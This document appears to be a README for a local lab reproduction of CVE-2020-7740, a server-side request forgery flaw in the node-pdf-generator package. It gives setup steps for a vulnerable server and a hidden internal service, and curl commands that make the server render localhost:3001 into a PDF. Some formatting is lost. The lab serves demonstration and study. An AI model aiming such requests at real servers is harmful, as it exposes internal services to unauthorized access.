This affects all versions of package node-pdf-generator. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.
- Build the container with
- Run the container with
docker run -p 3000:3000 cve-2020-7740 - Notice that we cannot visit
localhost:3001directly - Send the request with curl using
curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdf - View
test.pdfto view the localhost website that is supposed to be hidden.
- Clone the project using
git clone {link to be inserted} - Install the dependencies from
https://wkhtmltopdf.org/ - Start the server using
node .\NodePdfGeneratorServerthe server will be running atlocalhost:3000 - Install the requirements of the hidden python server using
python3 -m pip install -r requirements.txt - Start the hidden server using
python3 HiddenServicethe server will be running at 'localhost:3001`
- A get request with a body is sent to the server. This can be sent using
curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf - This will save a copy of the html page of
http://www.google.comto the filetest.pdf
- Other URLs that is fed to the server will be visited by the server in order for it to convert the website to pdf.
- This allows the user forge a server request by giving the server an internal IP address for it to target.